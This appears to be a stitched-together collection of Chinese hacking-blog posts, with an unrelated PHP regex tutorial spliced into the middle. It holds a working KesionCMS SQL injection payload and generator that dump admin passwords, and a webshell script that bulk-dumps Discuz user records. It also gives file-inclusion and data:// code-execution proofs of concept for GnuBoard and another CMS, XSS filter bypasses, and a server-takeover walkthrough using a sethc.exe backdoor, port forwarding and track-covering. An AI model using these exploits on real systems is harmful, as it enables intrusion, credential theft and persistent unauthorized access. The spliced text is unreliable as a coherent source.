Class Ajax_Check
Private KS
Private Sub Class_Initialize()
Set KS=New PublicCls
End Sub
Private Sub Class_Terminate()
Set KS=Nothing
End Sub
Public Sub Kesion()

Select Case KS.S(“Action”)
Case “checkusername”
Call CheckUserName()
Case “checkemail”
Call CheckEmail()
Case “checkcode”
Call CheckCode()
Case “getregform”
Call GetRegForm()
Case “getcityoption”
Call getCityOption()
End Select
End Sub

……略去无关代码

Sub getCityOption()
Dim Province,XML,Node
Province=UnEscape(KS.S(“Province”))  //注意这里
Dim RS:Set RS=Server.CreateObject(“ADODB.RECORDSET”)
RS.Open “Select top 200 a.ID,a.City From KS_Province a Inner Join KS_Province b On A.ParentID=B.ID Where B.City=’” & Province & “‘ order by a.orderid,a.id”,conn,1,1
If Not RS.Eof Then
Set XML=KS.RsToXml(Rs,”row”,”")
End If
RS.Close : Set RS=Nothing
If IsObject(XML) Then
For Each Node In XML.DocumentElement.SelectNodes(“row”)
KS.Echo “<option value=”"” & node.SelectSingleNode(“@city”).text &”"”>” & node.SelectSingleNode(“@city”).text &”</option>”
Next
End If
Set XML=Nothing
End Sub
End Class

以上代码中的Province=UnEscape(KS.S(“Province”)) 调用自定义函数KS.S进行过滤，接着又调用UnEscape函数解码！

其中KS.S 函数 与UnEscape函数 原型如下:

Function DelSql(Str)
Dim SplitSqlStr,SplitSqlArr,I
SplitSqlStr=”dbcc|alter|drop|*|and |exec|or |insert|select|delete|update|count |master|truncate|declare|char|mid|chr|set |where|xp_cmdshell”
SplitSqlArr = Split(SplitSqlStr,”|”)
For I=LBound(SplitSqlArr) To Ubound(SplitSqlArr)
If Instr(LCase(Str),SplitSqlArr(I))>0 Then
Die “<script>alert(‘系统警告！\n\n1、您提交的数据有恶意字符” & SplitSqlArr(I) &”;\n2、您的数据已经被记录;\n3、您的IP：”&GetIP&”;\n4、操作日期：”&Now&”;\n                Powered By Kesion.Com!’);window.close();</script>”
End if
Next
DelSql = Str
End Function
‘取得Request.Querystring 或 Request.Form 的值
Public Function S(Str)
S = DelSql(Replace(Replace(Request(Str), “‘”, “”), “”"”, “”))
End Function

这里编码出现混乱，产生了与php的二次编码类似的漏洞，利用比较简单，可以union：

http://localhost/user/reg/regajax.asp?action=getcityoption&province=%2527%2520%2575%256e%2569%256f%256e%2520%2553%2565%256c%2565%2563%2574%2520%2574%256f%2570%2520%2531%2530%2520%2541%2564%256d%2569%256e%2549%2544%252c%2555%2573%2565%2572%254e%2561%256d%2565%2526%2563%2568%2572%2528%2531%2532%2534%2529%2526%2550%2561%2573%2573%2557%256f%2572%2564%2520%2546%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500

上面的利用针对ACCESS，MSSQL需要改下SQL语句：

<?php
$str = “‘ union Select top 10 AdminID,UserName&chr(124)&PassWord From KS_Admin”;
for ($i=0; $i<=strlen($str); $i++){
$temp .= “%25″.base_convert(ord($str[$i]),10,16);
}
echo $temp.”0″;
?>

修改’ union Select top 10 AdminID,UserName&chr(124)&PassWord From KS_Admin为相应的SQL语句即可。（MSSQL直接备份差异比较方便）

因为解码的时候进行了CLng类型转换，提交字符可以使其报错从而爆出物理路径
爆物理路径:http://localhost/user/reg/regajax.asp?action=getcityoption&province=%25i

上图：

这儿利用的是马儿的专家模式（自己写代码）。
ini_set(‘display_errors’, 1);
set_time_limit(0);
error_reporting(E_ALL);
$connx = mysql_connect(“:/var/tmp/mysql.sock”, “forum”, “xx!!xx3″) or die(“Could not connect: ” . mysql_error());
mysql_select_db(“discuz”,$connx) or die(“Could not connect: ” . mysql_error());
$result = mysql_query(“Select * FROM members”,$connx) or die(“Could not connect: ” . mysql_error());
$i = 0;
$tmp = ”;
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
$i = $i+1;
$tmp .= implode(“::”, $row).”\n”;
if(!($i%500)){//500条写入一个文件
$filename = ‘/home/httpd/bbs.xxxxx/forumdata/cache/user’.intval($i/500).’.txt’;
file_put_contents($filename,$tmp);
$tmp = ”;
}
}
mysql_free_result($result);

//down完后delete

ini_set(‘display_errors’, 1);
error_reporting(E_ALL);
$i = 0;
while($i<32) {
$i = $i+1;
$filename = ‘/home/httpd/bbs.xxxx/forumdata/cache/user’.$i.’.txt’;
unlink($filename);
}

发现时间 2008-10-02
公开时间 2011-02-27
漏洞影响版本 2.1.0 2.1.1
状态 已修补

漏洞代码如下：
// go.php
$q_url=$_SERVER["REQUEST_URI"];
@list($relativePath, $rawURL)=@explode(‘/go.php/’, $q_url);
$rewritedURL=$rawURL; // 来自$_SERVER["REQUEST_URI"],可以任意提交的:)
…
$RewriteRules[]=”/component\/([^\/]+)\/?/”;
// 这个正则限制的不够细致,可以很轻易的绕过:)
…
$RedirectTo[]=”page.php?pagealias=\\1″;

$i=0;
foreach ($RewriteRules as $rule) {
if (preg_match($rule, $rewritedURL)) {
$tmp_rewritedURL=preg_replace($rule, ‘<'.$RedirectTo[$i].'<', $rewritedURL, 1);
$tmp_rewritedURL=@explode('<', $tmp_rewritedURL);
$rewritedURL=($tmp_rewritedURL[2]) ? false : $tmp_rewritedURL[1];
break;
}
$i+=1;
}

if ($rewritedURL==$rawURL || !$rewritedURL) {
...
$parsedURL=parse_url ($rewritedURL);
// 这里的$parsedURL['query']就是要利用的变量了:)
parse_str($parsedURL['query']);
// 通过这个地方可以覆盖任意变量
include(basename($parsedURL['path']));
// 通过上面的覆盖,可以利用这里包含本地文件,不过用了basename()函数处理:(

这个漏洞不是很复杂,关键说说利用,这里有两个利用点,一个覆盖,一个利用覆盖来包含,虽然用了basename()来限制,但是可以利用data://来执行命令.只是这种方式的利用是有限制的[PHP>5.2.0&allow_url_include=On].不过没关系,还有更好的利用方式

来看下global.php文件:
…
unregister_GLOBALS(); //When register_globals=On
…
function unregister_GLOBALS() { //When register_globals = ‘on’
if (!ini_get(‘register_globals’)) { //Already off
return;
}
// Variables that shouldn’t be unset
$noUnset = array(‘_GET’, ‘_POST’, ‘_COOKIE’, ‘_REQUEST’, ‘_SERVER’, ‘_ENV’, ‘_FILES’);
$input = array_merge($_GET, $_POST, $_COOKIE, $_SERVER, $_ENV, $_FILES, isset($_SESSION) && is_array($_SESSION) ? $_SESSION : array());
foreach ($input as $k => $v) {
if ($k==’GLOBALS’) {
global $kgr;
$kgr=0;
kill_GLOBALS($input[$k]); //GLOBALS is recursive -,-
}
elseif (!in_array($k, $noUnset) && isset($GLOBALS[$k])) {
$GLOBALS[$k]=NULL;
}
}
}
在这里取消了全局变量,但是我们可以通过go.php中的覆盖变量和包含文件来绕过unregister_GLOBALS()的限制,触发变量未初始化漏洞,这将导致xss、sql注射、命令执行等众多严重的安全问题:)

其实这里还有其他的利用思路,就不多说了,各位看官发挥自己的想象力吧:)

EXP or POC?自己搞喽;P

与include的区别，它可以动态包含文件。
被包含文件里面可执行ASP代码，在国外的源码中有使用的。

include.asp?file=./1.txt

1.txt

<%response.write(now())%>

我们在PHP正则表达式的学习中会碰到修饰符，那么关于PHP正则表达式修饰符的理解以及使用我们需要注意什么呢？那么我们来具体的看看它的概念以及相关内容。在学习PHP正则表达式修饰符之前先来理解下贪婪模式，前面在元字符中提到过”?”还有一个重要的作用，即”贪婪模式”，什么是”贪婪模式” 呢？

PHP正则表达式贪婪模式：

比如我们要匹配以字母”a”开头字母”b”结尾的字符串，但是需要匹配的字符串在”a”后面含有很多个”b”，比如”a bbbbbbbbbbbbbbbbb”，那正则表达式是会匹配第一个”b”还是最后一个”b”呢？如果你使用了贪婪模式，那么会匹配到最后一个”b”，反之只是匹配到第一个”b”。

PHP正则表达式贪婪模式使用实例：

/a.+?b/
/a.+b/U

对比不使用贪婪模式的实例如下：

/a.+b/

上面使用了一个修饰符U，详见关于修饰符的介绍。

PHP正则表达式修饰符的理解：

在PHP正则表达式里面的修饰符可以改变正则的很多特性，使得正则表达式更加适合你的需要（注意：修饰符对于大小写是敏感的，这意味着”e”并不等于”E”）。

PHP正则表达式修饰符的种类及介绍：

◆i ：如果在修饰符中加上”i”，则正则将会取消大小写敏感性，即”a”和”A” 是一样的。

◆m：默认的正则开始”^”和结束”$”只是对于正则字符串如果在修饰符中加上”m”，那么开始和结束将会指字符串的每一行：每一行的开头就是”^”，结尾就是”$”。

◆s：如果在修饰符中加入”s”，那么默认的”.”代表除了换行符以外的任何字符将会变成任意字符，也就是包括换行符！

◆x：如果加上该修饰符，表达式中的空白字符将会被忽略，除非它已经被转义。

◆e：本修饰符仅仅对于replacement有用，代表在replacement中作为PHP代码。

◆A：如果使用这个修饰符，那么表达式必须是匹配的字符串中的开头部分。比如说”/a/A”匹配”abcd”。

◆E：与”m”相反，如果使用这个修饰符，那么”$”将匹配绝对字符串的结尾，而不是换行符前面，默认就打开了这个模式。

◆U：和问号的作用差不多，用于设置”贪婪模式”。

PHP正则表达式修饰符的相关内容就向你介绍到这里，希望对你了解和掌握PHP正则表达式修饰符有所帮助。

By Flyh4t

http://bbs.wolvez.org/

GnuBoard是韩国比较常见的一个论坛，存在较多的漏洞，其中common.php存在一个文件包含漏洞
看common.php代码<!–more–>

@extract($_GET);
@extract($_POST);
@extract($_SERVER);

……

if (!$g4_path || preg_match(“/:\/\//”, $g4_path))
die(“<meta http-equiv=’content-type’ content=’text/html; charset=$g4[charset]‘><script language=’JavaScript’> alert(‘肋给等 规过栏肺 函荐啊 沥狼登菌嚼聪促.’); </script>”);

//if (!$g4_path) $g4_path = “.”;

$g4['path'] = $g4_path; //只限制了$g4_path不能有字符 ://

unset($g4_path);

include_once(“$g4[path]/lib/constant.php”);  //本地文件包含漏洞
include_once(“$g4[path]/config.php”);

POC:

http://test.com/GnuBoard/common.php?g4_path=../../../../../../../etc/passwd%00

———————————————————————————–
在Ryat牛的提示下，这个本地包含晋升为远程代码执行漏洞。
bypass_local.php

<?php
if (!$g4_path || preg_match(“/:\/\//”, $g4_path))
die(“fuck”);
$g4['path'] = $g4_path;
unset($g4_path);
include_once(“$g4[path]/lib/constant.php”);
?>

在allow_url_include = On且PHP >= 5.2.0的条件下
提交bypass_local.php?g4_path=data:;base64,PD9waHBpbmZvKCk7Lyo=
成功执行phpinfo()

http://hi.baidu.com/cncxz/blog/item/8d6aaa08d1d96fbc2fddd4ee.html

data:类似于javascript:，在很大程度上，可以完成javascript的工作.

举一个例子：

进行XSS测试时，发现javascript与script等关键字都被过滤了（现在一般有点XSS意识的管理员都懂得过滤这两个关键字）。可用下面的语句：


data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4=
这语句和 javascript:alert(“xss”) 或者 作用是一样的。

data:的语法从上面的语句中也可以看得很清楚了，base64为编码方式，可以任意改，可以UTF-8可以UTF-7，只要后面编码后的内容做相应的更改就可以了。不仅仅是弹窗，如果想src到一个JS脚本，也是完全可以的。

SuperHei对data:的总结是：

1.可以指定MIME-type如text/html
2.可以指定编码如data:;charset=UTF-8,Hello
3.firefox/ie8/Opera等支持它

有兴趣的同学可以参看FIREFOX官方：

http://www-archive.mozilla.org/quality/networking/testing/datatests.html

data:是一个好东西啊~OVER！

C:\>netstat -aon|findstr “9050″ TCP 127.0.0.1:9050
0.0.0.0:0 LISTENING 2016

看到了吗，端口被进程号为2016的进程占用，继续执行下面命令：

C:\>tasklist|findstr “2016″
tor.exe 2016 Console 0 16,064 K

很清楚吧，tor占用了你的端口

数据包经过路由器就被抛弃了.
初步判断是路由器设置了ACL表。
扫描了一下目标服务器，只开了80端口，服务器操作系统是WINDOWS 2003. 端口复用在2003上不管用。 看来只有把IIS停了再把45678端口转到80端口上了。
在c:\windows 目录中写了个1.bat
内容是
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe /y /*替换sethc.exe，登陆上终端后按5下Shift打开CMD窗口*/
net stop w3svc
lcx.exe -tran 80 127.0.0.1 45678
net start w3svc /*这一行是为了当lcx意外崩溃后启动IIS。*/
不过需要注意的是 这个1.bat不能直接用ms10048.exe 运行 ，因为IIS进程是ms10048.exe的父进程 ，把IIS结束后ms10048.exe也就自动退出了 所以不会运行后面的代码
运行time/t得到服务器的时间是20:23。 ms10048.exe at 20:25 c:\windows\1.bat 让服务器在20:25运行1.bat 为了保险起见 再运行一个ms10048.exe at 20:40 shutdown -r 让服务器在20：40重启。
一两分钟后用远程桌面连接 服务器80端口成功连上，按无暇5下SHIFT键弹出CMD窗口 添加用户成功登陆。登陆后运行 at \delete \y 删除刚才添加的定时重启任务。
接下来就该干什么干什么去了。
退出的时候可以直接重启服务器 ，不过这样不太厚道。 打开一个cmd窗口 运行query user 找到自己的用户ID ，我的用户ID是2。 然后在CMD窗口里输入 taskkill /IM lcx.exe /F&logoff 2&net user 410502 /del&net start w3svc 这行命令的意思是 结束lcx.exe 注销我的用户 删掉我的用户 然后启动IIS.
提权到此顺利结束。